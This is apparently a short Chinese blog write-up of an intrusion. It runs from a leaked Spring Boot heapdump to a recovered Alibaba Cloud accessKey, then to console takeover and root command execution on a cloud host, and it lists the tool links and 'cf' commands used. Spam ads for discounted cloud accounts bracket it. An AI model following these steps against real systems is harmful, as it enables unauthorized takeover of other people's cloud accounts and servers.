记一次heapdump泄露到拿下云主机
阿里云国内75折 回扣 微信号:monov8 |
阿里云国际,腾讯云国际,低至75折。AWS 93折 免费开户实名账号 代冲值 优惠多多 微信号:monov8 飞机:@monov6 |
一、信息泄露
通过前期信息收集发现某站存在springboot env 泄露。
二、发现accessKey
通过对其进行web扫描发现heapdump文件进行下载下载完成后使用解密工具对heapdump文件进行解密。
工具下载链接https://github.com/wyzxxz/heapdump_tool
三、对accessKey进行利用拿下存储桶以及云主机
发现accessKey后使用cf工具进行利用拿下oss存储桶以及云主机。
工具下载链接https://github.com/teamssix/cf
详细使用手册https://wiki.teamssix.com/cf/
cf config
配置accessKeyIdy以及accessKeySecret
这里需要先指定云服务厂商
cf.exe alibaba perm
一键列出当前访问凭证的权限
cf alibaba console
一键接管控制台
cf alibaba esc exec -b
CF 为实例执行命令的操作拿下root权限
连接控制台
阿里云国内75折 回扣 微信号:monov8 |
阿里云国际,腾讯云国际,低至75折。AWS 93折 免费开户实名账号 代冲值 优惠多多 微信号:monov8 飞机:@monov6 |